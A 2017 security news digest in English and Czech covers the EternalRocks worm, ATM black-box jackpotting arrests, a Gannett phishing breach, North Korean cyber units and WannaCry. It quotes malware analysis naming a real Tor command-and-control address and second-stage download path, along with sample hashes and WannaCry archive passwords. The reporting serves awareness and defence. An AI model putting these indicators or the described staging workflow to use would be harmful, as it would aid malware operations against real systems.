He reported the problem to Yahoo, and was pleased with Yahoo's response. It was fixed well within Yahoo's self-imposed 90-day deadline, and, he says, the communication was excellent. Compare this to his comments on communication with Box: "communications were painful, as if they were filtered through a gaggle of PR representatives and an encumbrance of lawyers."

The fix itself was simple and complete: Yahoo retired ImageMagick.

Despite its problems over the last few years, Yahoo has come a long way with improving its vulnerability response approach. In 2013, High-Tech Bridge (HTB) found numerous XSS flaws in Yahoo servers. "Each of the discovered vulnerabilities," it said at the time, "allowed any @yahoo.com email account to be compromised simply by sending a specially crafted link to a logged-in Yahoo user and making him/her click on it."

The HTB researcher was offered a $12-50 Yahoo store voucher for each of the flaws. This time, however, Evans as offered a total of $14,000 for this and a separate issue yet to be documented. When Evans suggested donating it to charity, Yahoo doubled the charitable award to $28,000.

SecurityWeek has asked Yahoo for a comment on the issue, but has not yet received a reply.

Expert founds EternalRocks, a malware that uses 7 NSA Hacking Tools
23.5.2017 securityaffairs BigBrothers

A security expert discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw to spread itself like WannaCry ransomware.
The security expert Miroslav Stampar, a member of the Croatian Government CERT, has discovered a new worm, dubbed EternalRocks, that exploits the EternalBlue flaw in the SMB protocol to spread itself like the popular WannaCry ransomware.

Stampar discovered the EternalRocks after it infected his SMB honeypot, he called the malware ‘DoomsDayWorm.’

Follow
Miroslav Stampar @stamparm
If I will be asked to choose a name, let it be a DoomsDayWorm :D c52f20a854efb013a0a1248fd84aaa95
3:44 AM - 18 May 2017
8 8 Retweets 9 9 likes
Twitter Ads info & Privacy
Stampar discovered that the EternalRocks disguises itself as WannaCry, but instead of delivering a ransomware, it takes over the affected computer to power other attacks.

The researcher decompiled an older sample (start of May) of EternalRocks and published it on Github.

Miroslav Stampar @stamparm
Just captured 406ac1595991ea7ca97bc908a6538131 and 5c9f450f2488140c21b6a0bd37db6a40 in MS17-010 honeypot. MSIL/.NET #WannaCry copycat(s)
5:28 PM - 17 May 2017
73 73 Retweets 87 87 likes
Twitter Ads info & Privacy
Follow
Miroslav Stampar @stamparm
Info on (new) EternalRocks worm can be found on https://github.com/stamparm/EternalRocks/ …. Will keep it updated, along with @_jsoo_
2:43 PM - 18 May 2017
Photo published for stamparm/EternalRocks
stamparm/EternalRocks
Contribute to EternalRocks development by creating an account on GitHub.
github.com
137 137 Retweets 136 136 likes
Twitter Ads info & Privacy
Unlike the WannaCry Ransomware that leverages the two NSA hacking tools EternalBlue and DoublePulsar, EternalRocks exploits seven exploits leaked by Shadow Brokers and its code doesn’t include a kill-switch.

EternalRocks was developed to avoid detection and to remain undetectable on the target system, it uses the following NSA exploits:

EternalBlue — SMBv1 exploit tool
EternalRomance — SMBv1 exploit tool
EternalChampion — SMBv2 exploit tool
EternalSynergy — SMBv3 exploit tool
SMBTouch — SMB reconnaissance tool
ArchTouch — SMB reconnaissance tool
DoublePulsar — Backdoor Trojan
EternalRocks downloads all the above SMB exploits to the infected computer, then it scans the internet for open SMB ports on other systems to compromise.

EternalRocks

Giving a close look at the list we can find the SMB exploits EternalBlue, EternalChampion, EternalSynergy and EternalRomance.

The DoublePulsar is the exploit used by malware to implement network worm capabilities, while the SMBTouch and ArchTouch are SMB reconnaissance tools, designed to scan for systems hacking open SMB ports exposed on the Internet.

The EternalRocks works in two stages:

During the first stage, EternalRocks downloads the Tor web browser on the affected computers, then it uses the application to connect to the command-and-control (C&C) server located on the Tor network.

After 24 hours, the second stage starts, the malware delays its action in the attempt to avoid sandboxing techniques.

“First stage malware UpdateInstaller.exe (got through remote exploitation with second stage malware) downloads necessary .NET components (for later stages)TaskScheduler and SharpZLib from Internet, while dropping svchost.exe (e.g. sample) and taskhost.exe (e.g. sample). Component svchost.exe is used for downloading, unpacking and running Tor from archive.torproject.org along with C&C (ubgdgno5eswkhmpy.onion) communication requesting further instructions (e.g. installation of new components).” wrote the researcher.

“Second stage malware taskhost.exe (Note: different than one from first stage) (e.g. sample) is being downloaded after a predefined period (24h) from http://ubgdgno5eswkhmpy.onion/updates/download?id=PC and run. After initial run it drops the exploit pack shadowbrokers.zip and unpacks contained directories payloads/, configs/ and bins/. After that, starts a random scan of opened 445 (SMB) ports on Internet, while running contained exploits (inside directory bins/) and pushing the first stage malware through payloads (inside directory payloads/). Also, it expects running Tor process from first stage to get further instructions from C&C.“

Europol arrested 27 for jackpotting attacks on ATM across the Europe
23.5.2017 securityweek CyberCrime

27 people have been arrested by the Europol for jackpotting attacks on ATM across many countries in Europe.
Europol has arrested 27 people accused of being involved in a series of successful black box attacks against ATMs across Europe. Since 2016, these attacks have resulted in more than €45 million in losses.“The efforts of a number of EU Member States and Norway, supported by Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT), culminated in the arrest of 27 individuals linked with so-called ATM “Black Box” attacks across Europe.” states the Europol.“Perpetrators responsible for this new and sophisticated method of ATM jackpotting were identified in a number of countries over different periods of time in 2016 and 2017. There were arrests in Czech Republic (3), Estonia (4), France (11), the Netherlands (2), Romania (2), Spain (2) and Norway (3).”First attacks were observed in 2015, but the technique was widely adopted by crooks since 2016.
“In a European ATM Crime Report covering 2016 EAST has reported that ATM black box attacks were up 287% when compared to 2015.” states the European ATM Security Team (EAST).

“A total of 58 such attacks were reported by ten countries, up from 15 attacks during 2015. ‘Black Box’ is the connection of an unauthorised device which sends dispense commands directly to the ATM cash dispenser in order to ‘cash-out’ the ATM. Related losses were down 39%, from €0.74 million to €0.45 million.”

The technique is very effective, it has been estimated that crooks have stolen €45 million using it since 2016.

The attack method was first reported by the notorious expert Barnaby Jack in 2010, the researcher coined the term jackpotting during the 2010 Black Hat conference.

The brute-force black box attack against an ATM starts by punching a hole into the machine’s casing, then the crooks connect a laptop to the exposed cables or ports and use it to issue commands to the ATM to dispense money.

jackpotting ATM attacks

The arrests were part of a still ongoing Europol operation conducted with law enforcement of numerous states in Europe. Below the details of the arrests:

Netherlands (2 people)
Romania (2 people)
Spain (2 people)
Norway (3 people)
Czech Republic (3 people)
Estonia (4 people)
France (11 people)
“Our joint efforts to tackle this new criminal phenomenon resulted in significant arrests across Europe. However the arrest of offenders is only one part of stopping this form of criminality. Increasingly we need to work closely with the ATM industry to design out vulnerabilities at source and prevent the crime taking place,” said Steven Wilson, Head of Europol’s European Cybercrime Centre.

The crooks that were involved in the jackpotting ATM Black Box attacks are mainly from countries in Eastern Europe, such as Romania, Moldova, Russia, and Ukraine.

Let me suggest to read an interesting post that was written by the security expert Brian Krebs that is titled “Thieves Jackpot ATMs With ‘Black Box’ Attack” that describes this kind of attacks.

Hackeři napadli vydavatele amerického deníku USA Today, ohrozili data 18 tisíc zaměstnanců

23.5.2017 Novinky/Bezpečnost Hacking
Jedno z největších amerických novinových vydavatelství Gannet Co, do jehož portfolia patří i deník USA Today, napadli hackeři a získali citlivá data o 18 tisíc současných i dřívějších zaměstnancích. K průniku do vnitřní sítě vydavatelství došlo prostřednictvím phishingové zprávy, kterou pachatel zaslal na oddělené lidských zdrojů společnosti, uvedl server WeLiveSecurity.com.
E-mail vytvářel dojem, že pochází od manažera vydavatelství, který si vyžádal potvrzení přihlašovacích údajů do sítě. Útočníci se poté dostali do databáze zaměstnanců firmy.

Druhý velký útok po Gmailu
Vydavatelství v oficiálním prohlášení popřelo, že by existoval byť jen náznak úniku citlivých osobních údajů. E-mailové účty zaměstnanců, jejichž data mohli útočníci získat, ale podrobí důsledné kontrole. K útoku mělo dojít již 30. března, kdy se pachatel pokusil prostřednictvím jednoho z napadených uživatelských účtů provést bankovní převod peněz, který se mu nezdařil.

Podezřelou transakci zachytilo finanční oddělení vydavatelství, které iniciovalo rozsáhlé vyšetřování. Incident byl prozrazen ve stejnou dobu, kdy rezonovala kauza s podobným útokem na uživatele služby Gmail.

Podle nevládní organizace Internet Society by firmy jako Gannet Co měly lépe předcházet případnému průniku nežádoucích osob k citlivým datům. „Pokud chtějí minimalizovat riziko narušení dat a průniků do zařízení, musí používat nejnovější systémy zabezpečení a mít povědomí o tom, jak řešit hrozby spojené se sociálním inženýrstvím,“ prohlásil Olaf Kolkman, ředitel divize internetových technologií v organizaci Internet Society.

„Naše zpráva za rok 2016 došla k závěru, že pokud by americké firmy zavedly patřičná opatření, mohly by se vyhnout až 93 procentům všech průniků do svých systémů,“ dodal.

Ohroženy mohou být i české firmy
Úniky citlivých osobních a obchodních dat patří podle bezpečnostního experta společnosti ESET Václava Zubra mezi největší kybernetické hrozby firem, ale i různých veřejných institucí. „Mnohé organizace zcela zásadně podceňují bezpečnostní opatření. Velmi často pomíjí bezpečnostní školení pro své zaměstnance. Přitom to je právě lidský faktor, který hraje při phishingových útocích a sociálním inženýrství hlavní roli,“ uvedl Zubr.

„Každá společnost by měla provádět minimálně jednou ročně povinná školení bezpečnosti práce na internetu pro své zaměstnance,“ dodává.

Experti dohlížející na sankce proti KLDR jsou terčem hackerů

23.5.2017 Novinky/Bezpečnost Viry
Experti OSN vyšetřující porušování sankčních podmínek uvalených na Severní Koreu jsou terčem kybernetických útoků, za kterými stojí hackeři s velmi dobrým přehledem o jejich práci. OSN to uvádí v interním varovném e-mailu, napsala v pondělí agentura Reuters.
Hackerům se 8. května podařilo proniknout do počítače jednoho z expertů. "Spolu se souborem zip (formát pro kompresi dat) byla poslána velmi osobní zpráva, která ukazuje, že hackeři mají velice podrobný přehled o současné vyšetřovací struktuře výboru a jeho pracovních metodách," citovala agentura Reuters z varovného e-mailu. Ten také uvedl, že výbor, který sankční podmínky sleduje, byl podobně napaden v roce 2016.

Fakt, že jeden z počítačů člena výboru byl prolomen, potvrdilo italské zastoupení při OSN. Zmíněný varovný e-mail hovoří o tom, že výbor je pod neustálým kybernetickým tlakem hackerů.

Severokorejské zastoupení při OSN odpovědnost za hackerský útok na experty výboru odmítlo s tím, že taková obvinění jsou směšná. KLDR rovněž popřela, že by se podílela na nedávném útoku vyděračským virem WannaCry, který se rozšířil na více než 230 000 počítačů po celém světě. Bezpečnostní odborníci přitom v útoku WannaCry nalezli určité technické souvislosti, které vedou ke KLDR.

WannaCry – první i vylepšená druhá generace – útočí úplně stejně jako ostatní vyděračské viry, které jsou označovány souhrnným názvem ransomware. Nejprve škodlivý kód pronikne do počítače, pak jej uzamkne a zašifruje všechna data. Za jejich zpřístupnění následně počítačoví piráti požadují výkupné.

Jednotka 180: Severokorejská úderka kybernetické války, která straší Západ

23.5.2017 Novinky/Bezpečnost BigBrother
Hlavní severokorejská špionážní agentura má svou speciální buňku zvanou Jednotka 180, která stojí za několika nejtroufalejšími a úspěšnými kyberútoky Severní Koreje (KLDR). S odkazem na přeběhlé Severokorejce, úřady i experty na internetovou bezpečnost to uvedla agentura Reuters.
Severní Koreji byla v posledních letech dávána za vinu série online útoků, většinou na finanční sítě v USA, Jižní Koreji a více než tuctu dalších zemí.

Vyšetřovatelé také uvedli, že našli technické důkazy, které mohou spojovat Severní Koreu s nedávným útokem virem WannaCry, který postihl více než tři sta tisíc počítačů ve 150 zemích. Pchjongjang obvinění označil za „směšné“.

Podstata těchto obvinění je napojení Severní Koreje na hackerskou skupinu Lazarus, která je spojována s loňskou kyberkrádeží 81 miliónů dolarů (téměř dvě miliardy korun) z bangladéšské centrální banky a s útokem na hollywoodské studio společnosti Sony.

Vláda Spojených států z útoku na Sony obvinila Severní Koreu, podle některých vládních činitelů vyšetřovatelé připravují proces proti Pchjongjangu v případu bangladéšské banky. V obou případech zatím nebyly předloženy žádné přesvědčivé důkazy ani nebyla vznesena oficiální obvinění. KLDR odmítla, že by za oběma útoky stála.

Do ciziny za lepším internetem
KLDR je jednou z nejvíce uzavřených zemí světa a jakékoliv podrobnosti o jejích utajovaných operacích je velmi obtížné získat. Nicméně nějaká vodítka poskytují jednak experti, kteří samotářskou zemi studují, a jednak Severokorejci, kterým se podařilo dostat za hranice do Jižní Koreje nebo na Západ.

Jedním z nich je bývalý profesor informatiky Kim Hjong-kuang, který přeběhl do Jižní Koreje v roce 2004 a stále má své zdroje v KLDR. Podle Kima byly kyberútoky Pchjongjangu vedené za účelem získání peněz a s největší pravděpodobností organizované Jednotkou 180, která je součástí Generálního průzkumného úřadu, severokorejskou zpravodajskou špionážní agenturou.

„Jednotka 180 byla zapojena do hackování finančních institucí, kde prolomí zabezpečení a z bankovních účtů vybírá peníze,“ řekl Reuters Kim, který už v minulosti uvedl, že jeden z jeho bývalých studentů je ve Strategickém kybervelitelství, tedy jakési kyberarmády KLDR.

„Hackeři jezdí do ciziny, aby někde našli lepší internetové připojení, než má KLDR, aby za sebou nenechávali stopy,“ dodal Kim. Podle něj pracují v utajení, coby zaměstnanci obchodních společností.

Podle experta na Severní Koreu z amerického Centra pro strategické a mezinárodní studia Jamese Lewise Pchjongjang nejprve hackování používal jako nástroj pro špionáž a poté k politickým provokacím Jižní Koreje a Spojených států.

Útok na jaderný reaktor
Jihokorejské úřady tvrdí, že mají důležité důkazy o severokorejských válečných kyberoperacích. „Severní Korea podniká kyberútoky ze zemí třetího světa, aby zakryla původ těchto operací,“ řekl Reuters An Čong-hi, náměstek jihokorejského ministra zahraničí. Kromě útoku na bangladéšskou banku je podle něj Pchjongjang podezřelý z útoků na banky na Filipínách, ve Vietnamu nebo v Polsku.

Podle jihokorejské policie se Severní Korea nabourala do více než 140 tisíc počítačů 160 jihokorejských společností a vládních úřadů, do kterých nainstalovala škodlivý kód, který má připravit půdu pro budoucí masívní kyberútok.

Severní Korea je také podezřelá z útoků na operátora jihokorejského jaderného reaktoru v roce 2014. KLDR jakoukoliv účast na útocích odmítla.

Podle Michaela Maddena, amerického experta na severokorejské vedení, je Jednotka 180 jednou z mnoha kyberválečných skupin v severokorejské zpravodajské komunitě.

„Personál je rekrutován ze středních škol a je trénován v elitních institucích,“ řekl Madden. „Mají určitou autonomii ve svých misích a úkolování,“ dodal s tím, že mohou pracovat například z hotelů v Číně nebo Východní Evropě.

Symantec: WannaCry útočil od února. Pravděpodobně za ním stojí skupina Lazarus
23.5.2017 CNEWS.CZ Viry

Bezpečnostní firmy se snaží vypátrat původ ransomwaru WannaCry a nové informace nabídl Symantec. Ten na svém blogu shrnuje dosavadní zkušenosti s tímto škodlivým kódem. První útok firma zaznamenala 10. února tohoto roku, kdy byla napadena jediná organizace.

Během dvou minut od nakažení prvního stroje se škodlivý kód rozšířil na stovku počítačů v organizaci. Útočnictvo za sebou zanechalo nástroje, jež se tak mohly stát předmětem zkoumání.

WannaCry útočil od února

Kromě nich bylo nalezeno pět druhů malwaru, tři z nich jsou přímo spojeny s hackerskou skupinou Lazarus. Dva ze trojice platí za varianty backdooru Destover, jenž byl použit v útoku na Sony. Třetím kouskem byl trojský kůň Volgmer, jenž byl Lazarem nasazován proti jihokorejským cílům. Novým vzorkem WannaCry bylo do 27. března napadeno nejméně pět organizací. Podle Symantecu zde nelze vysledovat vzorec, podle něhož byly cíle vybrány.

V tomto případě při nasazení vyděračského softwaru byly použity dva různé backdoory, a sice Alphanc a Bravonc. Krátká verze zní, že se jedná o škodlivé softwary, jež vykazují spojitost s Lazarem. Útoky v menší míře pokračovaly i v dubnu. Nakonec přišel nám již dobře známý rozsáhlý útok, který začal 12. května. V tento den se začala šířit další nová verze WannaCry, jež k šíření zneužila známé díry ve Windows (CVE-2017-0144 a CVE-2017-0145). Připomínám, že byly opraveny Microsoftem během března.

Ilustrační foto (zdroj: qimono / Pixabay)

Ransomware se šířil na počítače v lokální síti, ale i na vzdálené stroje připojené k internetu. Všechny nalezené varianty ransomwaru jsou si velmi podobné, archivy používané v rámci distribuce škodlivého kódu jsou šifrovány podobnými hesly (wcry@123, wcry@2016 a WNcry@2ol7). Peněženky používané pro příjem Bitcoinů v prvních útocích podle Symantecu nebyly využívány dalšímu skupinami.

I to jsou významné indikátory, které Symantec vedou k závěru, že za těmito hrozbami stojí stejná skupina. Již jsem zmínil skupinu Lazarus. WannaCry podle bezpečnostní firmy sdílí část kódu s backdoorem Contopee, jenž je spojen právě s Lazarem. Jedna z variant používá shodné šifry. WannaCry se dále podobá malwaru Fakepude a trojskému koni Alphanc, přičemž oba jsou spojeny se stejnou hackerskou skupinou.

Činnost skupiny Lazarus

V tomto bodě je vhodné odpovědět, kdo je tedy Lazarus. Tato skupina se zabývá kybernetickou zločineckou činností a její první doložené útoky byly zaznamenány v roce 2009. K jejím nejúspěšnějším zločinům patří již zmíněný útok na filmovou divizi Sony v roce 2014. V roce 2016 pak skupina zaútočila na Bangladesh Central Bank. Z této akce si odnesla kořist ve výši závratných 81 milionů dolarů.

Kaspersky Lab v březnu vydal report o skupině, kde dochází k zajímavým tvrzením. Detaily naleznete ve zmíněné zprávě, zde jen zmíním, že podle Kasperky Lab operoval Lazarus od začátku s velkým rozpočtem a jeho snahou je zřejmě být dále finančně soběstačný. Do hry vstoupila skupina Bluenoroff, která pod Lazarus spadá a která se podle všeho specializuje právě na získávání finančních zdrojů. Ta v podstatě vydělává peníze, aby udržela operace Lazara v činnosti. Ke své činnosti pak využívá pak škodlivé kódy vytvořené touto skupinou.

Takhle vypadá vyděračská obrazovka ransomwaru WannaCry
Již jsem uvedl, že odborná veřejnost WannaCry začala spojovat se Severní Koreou. Kasperky Lab před dvěma měsíci odhalil spojení mezi Bluenoroffem a Severní Koreou v podobě adresy IP. Protože je tedy Bluenoroff považována za součást skupiny Lazarus, může být WannaCry jakožto dítko Lazara skutečně prací lidí ze Severní Korei. Toto pojítko samo o sobě jako usvědčující důkaz není dostatečné, takže zatím můžeme leda spekulovat.

Ruský bezpečnostní podnik Kaspersky Lab ve své zprávě uvádí, že měřítko operací skupiny Lazarus, která výrazně roste od roku 2011, je šokující. Výroba malwaru, s nímž je zacházeno jako s jednorázovým materiálem, který je při dalším úroku nahrazen lepší zbraní, podle firmy nemůže být dílem amatérů. Zdá se, že Lazarus funguje jako továrna na malware, který následně distribuuje skrze více nezávislých subjektů. O skupině Lazarus patrně ještě uslyšíme.

WannaCry se neměl vůbec rozšířit. Stačilo, abychom používali Windows Update

23.5.2017 Živě.cz Viry
WannaCry se masivně rozšířil kvůli zranitelnosti ve Windows
Ta mu umožnila, aby se pokusil sám napadnout další počítače
Jenže ta chyba už je dva měsíce opravená!
Kdo se v týdnu setkal na svém PC s podobnou obrazovkou, musel buď zaplatit, nebo se smířit se ztrátou datKdo se v týdnu setkal na svém PC s podobnou obrazovkou, musel buď zaplatit, nebo se smířit se ztrátou datKdo se v týdnu setkal na svém PC s podobnou obrazovkou, musel buď zaplatit, nebo se smířit se ztrátou datJedna z modifikací WannaCry ve virtuálních WindowsŠíření ransomwaru WannaCry v prvních hodinách podle Avastu12 FOTOGRAFIÍ

O ransomwarovém útoku WannaCry z minulého víkendu už toho byly popsány stohy a to i u nás na Živě.cz, nicméně je třeba vyvrátit ještě jednu fámu, která se hned zkraje diskutovala zejména v zaoceánských médiích.

Takto se šířil WannaCry hodinu po hodině. Zaútočil v pátek během snídaně
Virus WannaCry vyděsil svět. Co hrozí a jak se bránit?
Může za to Microsoft?

Mnohá z nich totiž zpočátku za hlavní viníky označila NSA a Microsoft. Národní bezpečnostní agentura měla údajně přispět tím, že ve svých laboratořích napsala programy pro zneužití zranitelnosti Windows, kvůli které se pak mohl hotový virus lépe šířit lokálními sítěmi a internetem. A právě tyto nástroje, původně určené ke kybernetickým operacím NSA, unikly v minulosti na veřejnost a dostaly se nakonec až do rukou autorů WannaCry.

Podrobná analýza WannaCry na webu Microsoftu

Microsoft byl naopak viněn mnoha komentátory na protějším břehu Atlantiku za odmítavý přístup k tvorbě záplat pro staré verze Windows včele s XPčkami. Mnozí totiž měli během první vlny za to, že WannaCry napáchá nejvíce škody právě na dnes již nepodporovaném operačním systému Microsoftu, který stále používá nezanedbatelné procento počítačů.

WannaCry se nejvíce šířil na Windows 7. Záplata je přitom k dispozici už od března

Tweet Costina Raia, šéfanalytika z Kaspersky Lab, však tuto hypotézu jednoznačně vyvrátil a nepřímo označil za hlavního viníka celého průšvihu nás samotné. Tedy nás ne, v Česku měl totiž ransomware prozatím jen minimální zásah.

Photo published for Over 98% of All WannaCry Victims Were Using Windows 7
Costin Raiu ✔ @craiu
#WannaCry infection distribution by the Windows version. Worst hit - Windows 7 x64. The Windows XP count is insignificant.
15:40, 19. May. 2017
644 644 retweetů 406 406lajků
Informace o reklamách na Twitteru a soukromí
Z grafu výše je zřejmé, že počet napadených Windows XP, tedy alespoň podle Kaspersky Lab, byl naprosto… Zanedbatelný. Tato verze Windows tam vlastně vůbec nefiguruje. Drtivou většinu analyzovaných mašin naopak poháněly Windows 7.

WannaCry se mohl skrze Windows 7 opravdu velmi dobře šířit dál, protože vedle typické ruční nákazy (manuální spuštění viru třeba z poštovní přílohy a zašifrování PC) mohl zneužít ještě oné zranitelnosti ve Windows, zkopírovat se na další mašiny v lokální síti a dokonce i na internetu, no a opět se spustit. Právě tímto způsobem se nejspíše nakazily velké podniky jako ony citované britské nemocnice, některé drážní systémy v zahraničí aj.

Microsoft by si za takový průšvih zasloužil pohlavek a obvyklý odsudek typu: „No jo, zase ta děravá Windows. Ještě že mám na svém počítači Linux,“ jenže rozhodně ne v tomto případě. Jak to? Jednoduše z toho důvodu, že záplata oné zranitelnosti CVE-2017-0145 je oficiálně venku už dva měsíce. Microsoft ji zveřejnil jako hromadnou opravu MS17-010 a to 14. března letošního roku!

Aktualizovaná Windows by se mohla lépe bránit masivnímu šíření

Jelikož firma označila tento balík záplat jako kritický, brzy se dostal na všechny stanice připojené k internetu a to skrze obvyklý subsystém Windows Update. Tedy vlastně nedostal, ale měl se dostat. Proč k tomu zjevně v nejednom případě nedošlo, zůstává otázkou, rozhodně se však nejednalo o počítače mimo internet. To by se totiž tak rychle nenakazily. Doslova během několika hodin.

Co vlastně WannaCry šifruje?

Po aktivaci ransomware prochází úložiště a pokouší se zašifrovat soubory s příponami vypsanými níže. Oběť poškozené soubory snadno rozezná, mají totiž změněnou příponou na .WNCRY. Soubor obrazek.jpg se tedy promění v obrazek.jpg.WNCRY.

.123, .jpeg, .rb, .602, .jpg, .rtf, .doc, .js, .sch, .3dm, .jsp, .sh, .3ds, .key, .sldm, .3g2, .lay, .sldm, .3gp, .lay6, .sldx, .7z, .ldf, .slk, .accdb, .m3u, .sln, .aes, .m4u, .snt, .ai, .max, .sql, .ARC, .mdb, .sqlite3, .asc, .mdf, .sqlitedb, .asf, .mid, .stc, .asm, .mkv, .std, .asp, .mml, .sti, .avi, .mov, .stw, .backup, .mp3, .suo, .bak, .mp4, .svg, .bat, .mpeg, .swf, .bmp, .mpg, .sxc, .brd, .msg, .sxd, .bz2, .myd, .sxi, .c, .myi, .sxm, .cgm, .nef, .sxw, .class, .odb, .tar, .cmd, .odg, .tbk, .cpp, .odp, .tgz, .crt, .ods, .tif, .cs, .odt, .tiff, .csr, .onetoc2, .txt, .csv, .ost, .uop, .db, .otg, .uot, .dbf, .otp, .vb, .dch, .ots, .vbs, .der”, .ott, .vcd, .dif, .p12, .vdi, .dip, .PAQ, .vmdk, .djvu, .pas, .vmx, .docb, .pdf, .vob, .docm, .pem, .vsd, .docx, .pfx, .vsdx, .dot, .php, .wav, .dotm, .pl, .wb2, .dotx, .png, .wk1, .dwg, .pot, .wks, .edb, .potm, .wma, .eml, .potx, .wmv, .fla, .ppam, .xlc, .flv, .pps, .xlm, .frm, .ppsm, .xls, .gif, .ppsx, .xlsb, .gpg, .ppt, .xlsm, .gz, .pptm, .xlsx, .h, .pptx, .xlt, .hwp, .ps1, .xltm, .ibd, .psd, .xltx, .iso, .pst, .xlw, .jar, .rar, .zip, .java, .raw.
Jediným možným vysvětlením je tedy to, že se jednalo o počítače bez adekvátních záplat, a mnozí pozorovatelé se tak domnívají, že WannaCry byl speciálně navržen právě pro tento případ. Ostatně i jeho autoři museli dobře vědět, že oprava, která by spolehlivě zamezila jeho masivnímu šíření, je už dávno k dispozici. Zároveň však věděli, že mnozí na svých počítačích nejspíše vypínají či jinak omezují automatickou instalaci aktualizací a že se to děje spíše na východě. A právě na východě, především v Rusku, řádil WannaCry zdaleka nejvíce.

Je to přitom právě operační systém se všemi čerstvými záplatami a prostý selský rozum při surfování po webu, který nás před malwarem všeho druhu ochrání zdaleka nejlépe.

Phishingových webů s HTTPS přibývá, reagují na vývoj prohlížečů
23.5.2017 Root.cz Phishing

Roste poměr phishingových webů, které používají zabezpečení pomocí HTTPS. Snaží se tak vypadat důvěryhodněji a tím zvýšit svou šanci na úspěch. Je to přirozená reakce na vývoj prohlížečů, které HTTPS upřednostňují.
Už mnohokrát bylo řečeno, že HTTPS neznamená bezpečný web. Zajišťuje jen bezpečnou komunikaci s ním, ale nedokáže garantovat dobré úmysly provozovatele. Čím dál častěji tak narážíme na phishingové weby, které mají důvěryhodný certifikát a správně nasazené HTTPS.

Je to samozřejmě dáno především tím, že se prohlížeče čím dál víc přiklánějí k HTTPS a naopak varují například před vkládáním přihlašovacích údajů do stránek používajících nešifrované HTTP. Společně se seriózními weby jsou tak do šifrování tlačeny i phishingové stránky snažící se uživatele manipulovat.

To společně s bezproblémovou dostupností levných certifikátů, automatizací jejich nasazení a podporou v mnoha službách a utilitách přináší velmi rychlý rozvoj šifrování také u útočných stránek. Odborníci z britské společnosti Netcraft analyzovali phishingové weby a jejich zabezpečení.

Zvlášť se zaměřili na začátek letošního roku, kdy vyšel Firefox 51 a Chrome 56. To jsou verze, od kterých prohlížeče upozorňují na vkládání hesla do nezabezpečeného webu.

Pokud se takto bude chovat phishingový web, jehož jediným cílem je právě získat heslo, bude uživatel poměrně intenzivně varován. Proto se také tvůrci těchto podvodných stránek přizpůsobili a od začátku letošního roku je možné pozorovat dramatický nárůst HTTPS také na jejich webech.

Netcraft
Poměr phishingových webů používajících HTTPS
Před změnou v prohlížečích se poměr phishingových webů používajících HTTPS pohyboval dlouhodobě okolo 5 %. Těsně poté začal rychle stoupat a během necelých dvou měsíců se dostal na trojnásobek původních hodnot. Může to být způsobeno zlepšením na straně tvůrců phishingových stránek nebo také jednoduše tím, že se HTTPS šíří na běžných webech, které mohou být kompromitovány a zneužity k phishingu.

Útočníci se zjevně přizpůsobili novému trendu a jejich činnost je tak vlastně nechtěným vedlejším efektem původní snahy vedené zvýšenou bezpečnostní na webu. Uživatelé by tak měli být výrazně varováni před tím, aby se slepě spolehli na přítomnost zeleného zámečku. Přestože právě to jim bylo dlouhá léta zdůrazňováno, nyní je třeba je ještě naučit kontrolovat doménové jméno. I když ani to nemusí vždycky stačit.

Phishingový web Apple využívající HTTPS
Zajímavá jsou také zjištění o používanosti jednotlivých certifikačních autorit. Netcraft zaznamenal v prvním čtvrtletí přes 47 tisíc phishingových webů a těch s HTTPS zaznamenal v 96 % případů DV certifikát od Let's Encrypt nebo Comodo. Dvě třetiny z nich pocházely od stále rostoucí autority Let's Encrypt, která vydává certifikáty automatizovaně a zdarma.

Dvě autority nejčastěji zneužívané pro phising
Autority tvrdí, že jejich rolí není rozhodovat o závadnosti jednotlivých webů a dobrých úmyslech jejich provozovatelů. Snadný přístup k důvěryhodným certifikátům ale očividně nahrává také útočníkům, kteří je zneužívají ve velkém. Na místě je tedy otázka, zda tento přístup nepřehodnotit. Kdo a jak ale bude v době založení nové stránky posuzovat její účel a jak pozná, že se v budoucnu nezmění?

Netcraft má vlastní řešení, které hodnotí nebezpečnost dané domény podle jejího názvu. Domény typu www.ll-airbnb.com, payqal.limited nebo dropbox.com.login.verify.danaharperandfriends.com jsou tak automaticky ohodnoceny a zablokovány. Takové řešení by teoreticky mohlo zabránit alespoň nemalé části phishingových útoků. Můžeme ale počítat s tím, že pokud se něco podobného v budoucnu nasadí, útočníci se zase přizpůsobí a budou si registrovat domény v takové podobě, aby certifikát dostali. Pokrok nezastavíte, HTTPS bude za chvíli všude.

Online přehrávání filmů a seriálů: hrozba, kterou ignorujeme
23.5.2017 cdr.cz Bezpečnost
Sledování filmů online se může jevit jako neškodná zábava, při které vyskakuje pouze „pár“ reklam. Nebudeme rozebírat legálnost takového počínání, ale zaměříme se na bezpečnostní aspekty, které mohou mít velice nepříjemné následky.
Online Filmy 12
Nelegální kopírování filmů s námi bylo, je a nejspíše ještě nějakou tu dobu bude. Nicméně forma se postupem času mění. Z počátku jsme kopírovali z jedné VHSky na druhou, poté z DVD na DVD, stahovalo se z internetu… Forem je celá řada. Poslední dobou je však nejpopulárnější sledování filmů online. Existuje řada různých pochybných portálů, které poskytují možnost shlédnutí zdarma. Zda je obsah legální či nikoliv, necháme na někom jiném.

V hlavní roli peníze

Tyto portály musí nějak přežívat, profitují tedy z reklam. Bohužel se však jedná o ty nejhorší druhy reklam až ze sedmého kruhu internetového pekla. Neuvěřitelně otravné pop-up reklamy navíc s mládeži nepřístupným obsahem, blikající bannery s falešným varováním, že máte zavirovaný počítač, nebo phishingová tlačítka, kde je napsáno stáhnout, ale přitom vás zavedou tam, kam rozhodně nechcete.

Online Filmy 2
Jedná se o malvertising, složenina ze slov malware (škodlivý software) a advertising (reklamy). Tyto „reklamy“ se vás nesnaží nalákat na nějaký nový produkt či službu. Chtějí jen, abyste na blikající banner klikli a je jedno, zda oznamuje, že jste vyhráli nový iPhone či cokoliv jiného. Všechno je to jen balast, který dokáže udělat s počítačem slušnou neplechu.

Největší problém vidíme v tom, že při kliknutí na nějakou takovou reklamu se může stát, že nevědomky či omylem odsouhlasíte některé okno a stáhnete si do počítače ransomware (či jiný druh malwaru). Ten vám zašifruje data a můžete jít obnovovat systém ze zálohy. Každopádně problematika ransomware by vydala na vlastní článek, proto se jí zde nebudeme zabývat.

Viewimage
